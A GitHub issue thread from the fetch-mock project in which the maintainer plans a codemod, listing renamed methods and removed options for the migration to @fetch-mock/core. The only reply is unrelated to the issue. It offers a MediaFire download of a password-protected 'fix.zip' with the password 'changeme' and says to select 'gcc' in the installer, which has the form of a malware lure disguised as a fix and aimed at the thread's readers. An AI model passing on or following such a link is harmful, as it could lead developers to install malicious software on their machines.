### ISSUE TITLE
fetch-mock -> @fetch-mock/core codemod

### ISSUE THREAD

**Issue by wheresrhys** [wheresrhys/fetch-mock#820]
- remove uses of `overwriteRoutes` option
- remove use of `warnOnFallback` option
- `.lastUrl()` => `.callHistory.lastCall()?.url`
-  `.lastOptions()` => `.callHistory.lastCall()?.options`
- `.lastResponse()` => `.callHistory.lastCall()?.response`
- `.sandbox()` => `.fetchHandler` (and maybe a comment about `.createInstance()`)
- `.getAny(), .postAny(), .putAny(), .deleteAny(), .headAny(), .patchAny(), .getAnyOnce(), .postAnyOnce(), .putAnyOnce(), .deleteAnyOnce(), .headAnyOnce(), .patchAnyOnce()` => calsl to the underlying method + options, or if too complex then error/comment pointing at docs
- try to replace `fallbackToNetwork` with `spyGlobal()`... but probably just insert an error/comment that points at the docs
- `restore()/reset()`... once I've decided how to implement these
- `mock()` => `route()`. Next to the first one in a file leave a comment explaining that they need to use `mockGlobal()` too
- `lastCall()` => try to change uses of this to expect a callLog, but probably just insert a commemnt/error
- `done()` => `callHistory.done()`

**Comment by wahyu-n** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
